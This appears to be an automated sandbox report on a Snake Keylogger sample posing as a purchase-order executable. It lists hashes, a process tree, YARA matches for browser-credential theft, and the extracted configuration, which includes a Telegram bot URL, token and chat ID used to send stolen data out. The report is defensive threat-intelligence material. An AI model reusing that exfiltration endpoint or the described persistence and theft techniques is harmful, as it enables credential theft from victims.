Edit tour

Windows Analysis Report
PO_63738373663838____________________________________________________________________________.exe

Overview

General Information

Sample name:	PO_63738373663838____________________________________________________________________________.exe
Analysis ID:	1549124
MD5:	d3e321ae2428648bd5a282d473fb4118
SHA1:	d4495926d8b581725f62e17f12737c8a25217428
SHA256:	ebc7577a5a30f2110725657a7fd9fb779209c11c3cecc41824db1d13dc2d1aee
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

.NET source code contains potential unpacker

AI detected suspicious sample

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO_63738373663838____________________________________________________________________________.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe" MD5: D3E321AE2428648BD5A282D473FB4118)

InstallUtil.exe (PID: 7776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 8072 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Keywords.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Roaming\Keywords.exe" MD5: D3E321AE2428648BD5A282D473FB4118)

InstallUtil.exe (PID: 2632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendMessage?chat_id=5302361040", "Token": "6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE", "Chat_id": "5302361040", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1315973231.0000000006C50000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.3709580619.00000000032FB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.1494831199.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.3709879973.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x191e2:$x1: $%SMTPDV$ 0x1918a:$x3: %FTPDV$ 0x191ae:$m2: Clipboard Logs ID 0x193ec:$m2: Screenshot Logs ID 0x194fc:$m2: keystroke Logs ID 0x197d6:$m3: SnakePW 0x193c4:$m4: \SnakeKeylogger\
0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x180d:$a1: get_encryptedPassword 0x1af9:$a2: get_encryptedUsername 0x1619:$a3: get_timePasswordChanged 0x1714:$a4: get_passwordField 0x1823:$a5: set_encryptedPassword 0x2ebf:$a7: get_logins 0x2e22:$a10: KeyLoggerEventArgs 0x2a8d:$a11: KeyLoggerEventArgsEventHandler
0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x6802:$x1: $%SMTPDV$ 0x51d4:$x2: $#TheHashHere%& 0x67aa:$x3: %FTPDV$ 0x5174:$x4: $%TelegramDv$ 0x2a8d:$x5: KeyLoggerEventArgs 0x2e22:$x5: KeyLoggerEventArgs 0x67ce:$m2: Clipboard Logs ID 0x6a0c:$m2: Screenshot Logs ID 0x6b1c:$m2: keystroke Logs ID 0x6df6:$m3: SnakePW 0x69e4:$m4: \SnakeKeylogger\
00000000.00000002.1296947151.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.3709879973.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19c36:$x1: $%SMTPDV$ 0x19bde:$x3: %FTPDV$ 0x19c02:$m2: Clipboard Logs ID 0x19e40:$m2: Screenshot Logs ID 0x19f50:$m2: keystroke Logs ID 0x1a22a:$m3: SnakePW 0x19e18:$m4: \SnakeKeylogger\
0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14db5:$a1: get_encryptedPassword 0x150a1:$a2: get_encryptedUsername 0x14bc1:$a3: get_timePasswordChanged 0x14cbc:$a4: get_passwordField 0x14dcb:$a5: set_encryptedPassword 0x16467:$a7: get_logins 0x163ca:$a10: KeyLoggerEventArgs 0x16035:$a11: KeyLoggerEventArgsEventHandler
0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19daa:$x1: $%SMTPDV$ 0x1877c:$x2: $#TheHashHere%& 0x19d52:$x3: %FTPDV$ 0x1871c:$x4: $%TelegramDv$ 0x16035:$x5: KeyLoggerEventArgs 0x163ca:$x5: KeyLoggerEventArgs 0x19d76:$m2: Clipboard Logs ID 0x19fb4:$m2: Screenshot Logs ID 0x1a0c4:$m2: keystroke Logs ID 0x1a39e:$m3: SnakePW 0x19f8c:$m4: \SnakeKeylogger\
00000007.00000002.3709580619.0000000003269000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.1516774520.00000000046DA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x11ae0d:$a1: get_encryptedPassword 0x11b0f9:$a2: get_encryptedUsername 0x11ac19:$a3: get_timePasswordChanged 0x11ad14:$a4: get_passwordField 0x11ae23:$a5: set_encryptedPassword 0x11c4bf:$a7: get_logins 0x11c422:$a10: KeyLoggerEventArgs 0x11c08d:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x11fe02:$x1: $%SMTPDV$ 0x11e7d4:$x2: $#TheHashHere%& 0x11fdaa:$x3: %FTPDV$ 0x11e774:$x4: $%TelegramDv$ 0x11c08d:$x5: KeyLoggerEventArgs 0x11c422:$x5: KeyLoggerEventArgs 0x11fdce:$m2: Clipboard Logs ID 0x12000c:$m2: Screenshot Logs ID 0x12011c:$m2: keystroke Logs ID 0x1203f6:$m3: SnakePW 0x11ffe4:$m4: \SnakeKeylogger\
00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x637bd:$a1: get_encryptedPassword 0x63aa9:$a2: get_encryptedUsername 0x635c9:$a3: get_timePasswordChanged 0x636c4:$a4: get_passwordField 0x637d3:$a5: set_encryptedPassword 0x64e6f:$a7: get_logins 0x64dd2:$a10: KeyLoggerEventArgs 0x64a3d:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x687b2:$x1: $%SMTPDV$ 0x67184:$x2: $#TheHashHere%& 0x6875a:$x3: %FTPDV$ 0x67124:$x4: $%TelegramDv$ 0x64a3d:$x5: KeyLoggerEventArgs 0x64dd2:$x5: KeyLoggerEventArgs 0x6877e:$m2: Clipboard Logs ID 0x689bc:$m2: Screenshot Logs ID 0x68acc:$m2: keystroke Logs ID 0x68da6:$m3: SnakePW 0x68994:$m4: \SnakeKeylogger\
0000000C.00000002.3709879973.0000000002891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1271f0:$a1: get_encryptedPassword 0x17532e:$a1: get_encryptedPassword 0x1273bf:$a2: get_encryptedUsername 0x1754db:$a2: get_encryptedUsername 0x127019:$a3: get_timePasswordChanged 0x175157:$a3: get_timePasswordChanged 0x127108:$a4: get_passwordField 0x175246:$a4: get_passwordField 0x127206:$a5: set_encryptedPassword 0x175344:$a5: set_encryptedPassword 0x129003:$a7: get_logins 0x176fc3:$a7: get_logins 0x128f70:$a10: KeyLoggerEventArgs 0x176f44:$a10: KeyLoggerEventArgs 0x128c99:$a11: KeyLoggerEventArgsEventHandler 0x176cea:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x128c99:$x5: KeyLoggerEventArgs 0x128f70:$x5: KeyLoggerEventArgs 0x129701:$x5: KeyLoggerEventArgs 0x129a62:$x5: KeyLoggerEventArgs 0x176cea:$x5: KeyLoggerEventArgs 0x176f44:$x5: KeyLoggerEventArgs 0x177701:$x5: KeyLoggerEventArgs 0x177a62:$x5: KeyLoggerEventArgs 0xa2a6b:$m2: Clipboard Logs ID 0xa2b71:$m2: Screenshot Logs ID 0xa2bc7:$m2: keystroke Logs ID 0x12af8e:$m2: Clipboard Logs ID 0x12b094:$m2: Screenshot Logs ID 0x12b0ea:$m2: keystroke Logs ID 0x178f69:$m2: Clipboard Logs ID 0x17906f:$m2: Screenshot Logs ID 0x1790c5:$m2: keystroke Logs ID 0xa2cfc:$m3: SnakePW 0x12b21f:$m3: SnakePW 0x1791fa:$m3: SnakePW 0xa2b5d:$m4: \SnakeKeylogger\
Process Memory Space: InstallUtil.exe PID: 7776	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7776	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 7776	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Keywords.exe PID: 8144	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Keywords.exe PID: 8144	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Keywords.exe PID: 8144	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Keywords.exe PID: 8144	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Keywords.exe PID: 8144	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5ae65:$a1: get_encryptedPassword 0x5b147:$a2: get_encryptedUsername 0x5ac7b:$a3: get_timePasswordChanged 0x5ad76:$a4: get_passwordField 0x5ae7b:$a5: set_encryptedPassword 0x5d358:$a7: get_logins 0x5d2bb:$a10: KeyLoggerEventArgs 0x5cf26:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Keywords.exe PID: 8144	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5cf26:$x5: KeyLoggerEventArgs 0x5d2bb:$x5: KeyLoggerEventArgs 0x5dbc2:$x5: KeyLoggerEventArgs 0x5df23:$x5: KeyLoggerEventArgs 0x3357c:$m2: Clipboard Logs ID 0x33682:$m2: Screenshot Logs ID 0x336d8:$m2: keystroke Logs ID 0x5f4ef:$m2: Clipboard Logs ID 0x5f5f5:$m2: Screenshot Logs ID 0x5f64b:$m2: keystroke Logs ID 0x3380d:$m3: SnakePW 0x5f780:$m3: SnakePW 0x3366e:$m4: \SnakeKeylogger\ 0x5f5e1:$m4: \SnakeKeylogger\
Process Memory Space: InstallUtil.exe PID: 2632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 2632	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 2632	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 2632	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa6a8:$a1: get_encryptedPassword 0xa98a:$a2: get_encryptedUsername 0xa4be:$a3: get_timePasswordChanged 0xa5b9:$a4: get_passwordField 0xa6be:$a5: set_encryptedPassword 0xcb9b:$a7: get_logins 0xcafe:$a10: KeyLoggerEventArgs 0xc769:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 2632	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xc769:$x5: KeyLoggerEventArgs 0xcafe:$x5: KeyLoggerEventArgs 0xd405:$x5: KeyLoggerEventArgs 0xd766:$x5: KeyLoggerEventArgs 0xed32:$m2: Clipboard Logs ID 0xee38:$m2: Screenshot Logs ID 0xee8e:$m2: keystroke Logs ID 0xefc3:$m3: SnakePW 0x3c8f9:$m3: SnakePW 0x3f0fd:$m3: SnakePW 0x3f306:$m3: SnakePW 0x3f511:$m3: SnakePW 0x626c2:$m3: SnakePW 0x62aa9:$m3: SnakePW 0x62d48:$m3: SnakePW 0x67375:$m3: SnakePW 0xee24:$m4: \SnakeKeylogger\
Click to see the 51 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO_63738373663838____________________________________________________________________________.exe.6c50000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.Keywords.exe.46da600.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.InstallUtil.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a0d:$a1: get_encryptedPassword 0x14cf9:$a2: get_encryptedUsername 0x14819:$a3: get_timePasswordChanged 0x14914:$a4: get_passwordField 0x14a23:$a5: set_encryptedPassword 0x160bf:$a7: get_logins 0x16022:$a10: KeyLoggerEventArgs 0x15c8d:$a11: KeyLoggerEventArgsEventHandler
12.2.InstallUtil.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b622:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba55:$a4: \Orbitum\User Data\Default\Login Data 0x1ca94:$a5: \Kometa\User Data\Default\Login Data
12.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155e4:$s1: UnHook 0x155eb:$s2: SetHook 0x155f3:$s3: CallNextHook 0x15600:$s4: _hook
12.2.InstallUtil.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a02:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x199aa:$x3: %FTPDV$ 0x18374:$x4: $%TelegramDv$ 0x15c8d:$x5: KeyLoggerEventArgs 0x16022:$x5: KeyLoggerEventArgs 0x199ce:$m2: Clipboard Logs ID 0x19c0c:$m2: Screenshot Logs ID 0x19d1c:$m2: keystroke Logs ID 0x19ff6:$m3: SnakePW 0x19be4:$m4: \SnakeKeylogger\
11.2.Keywords.exe.45f21e0.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c0d:$a1: get_encryptedPassword 0x12ef9:$a2: get_encryptedUsername 0x12a19:$a3: get_timePasswordChanged 0x12b14:$a4: get_passwordField 0x12c23:$a5: set_encryptedPassword 0x142bf:$a7: get_logins 0x14222:$a10: KeyLoggerEventArgs 0x13e8d:$a11: KeyLoggerEventArgsEventHandler
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19822:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c55:$a4: \Orbitum\User Data\Default\Login Data 0x1ac94:$a5: \Kometa\User Data\Default\Login Data
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137e4:$s1: UnHook 0x137eb:$s2: SetHook 0x137f3:$s3: CallNextHook 0x13800:$s4: _hook
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c02:$x1: $%SMTPDV$ 0x165d4:$x2: $#TheHashHere%& 0x17baa:$x3: %FTPDV$ 0x16574:$x4: $%TelegramDv$ 0x13e8d:$x5: KeyLoggerEventArgs 0x14222:$x5: KeyLoggerEventArgs 0x17bce:$m2: Clipboard Logs ID 0x17e0c:$m2: Screenshot Logs ID 0x17f1c:$m2: keystroke Logs ID 0x181f6:$m3: SnakePW 0x17de4:$m4: \SnakeKeylogger\
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a0d:$a1: get_encryptedPassword 0x14cf9:$a2: get_encryptedUsername 0x14819:$a3: get_timePasswordChanged 0x14914:$a4: get_passwordField 0x14a23:$a5: set_encryptedPassword 0x160bf:$a7: get_logins 0x16022:$a10: KeyLoggerEventArgs 0x15c8d:$a11: KeyLoggerEventArgsEventHandler
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155e4:$s1: UnHook 0x155eb:$s2: SetHook 0x155f3:$s3: CallNextHook 0x15600:$s4: _hook
0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a02:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x199aa:$x3: %FTPDV$ 0x18374:$x4: $%TelegramDv$ 0x15c8d:$x5: KeyLoggerEventArgs 0x16022:$x5: KeyLoggerEventArgs 0x199ce:$m2: Clipboard Logs ID 0x19c0c:$m2: Screenshot Logs ID 0x19d1c:$m2: keystroke Logs ID 0x19ff6:$m3: SnakePW 0x19be4:$m4: \SnakeKeylogger\
0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xfcc2d:$a1: get_encryptedPassword 0xfcf19:$a2: get_encryptedUsername 0xfca39:$a3: get_timePasswordChanged 0xfcb34:$a4: get_passwordField 0xfcc43:$a5: set_encryptedPassword 0xfe2df:$a7: get_logins 0xfe242:$a10: KeyLoggerEventArgs 0xfdead:$a11: KeyLoggerEventArgsEventHandler
0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xfd804:$s1: UnHook 0xfd80b:$s2: SetHook 0xfd813:$s3: CallNextHook 0xfd820:$s4: _hook
0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x101c22:$x1: $%SMTPDV$ 0x1005f4:$x2: $#TheHashHere%& 0x101bca:$x3: %FTPDV$ 0x100594:$x4: $%TelegramDv$ 0xfdead:$x5: KeyLoggerEventArgs 0xfe242:$x5: KeyLoggerEventArgs 0x101bee:$m2: Clipboard Logs ID 0x101e2c:$m2: Screenshot Logs ID 0x101f3c:$m2: keystroke Logs ID 0x102216:$m3: SnakePW 0x101e04:$m4: \SnakeKeylogger\
0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6322d:$a1: get_encryptedPassword 0x63519:$a2: get_encryptedUsername 0x63039:$a3: get_timePasswordChanged 0x63134:$a4: get_passwordField 0x63243:$a5: set_encryptedPassword 0x648df:$a7: get_logins 0x64842:$a10: KeyLoggerEventArgs 0x644ad:$a11: KeyLoggerEventArgsEventHandler
0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x63e04:$s1: UnHook 0x63e0b:$s2: SetHook 0x63e13:$s3: CallNextHook 0x63e20:$s4: _hook
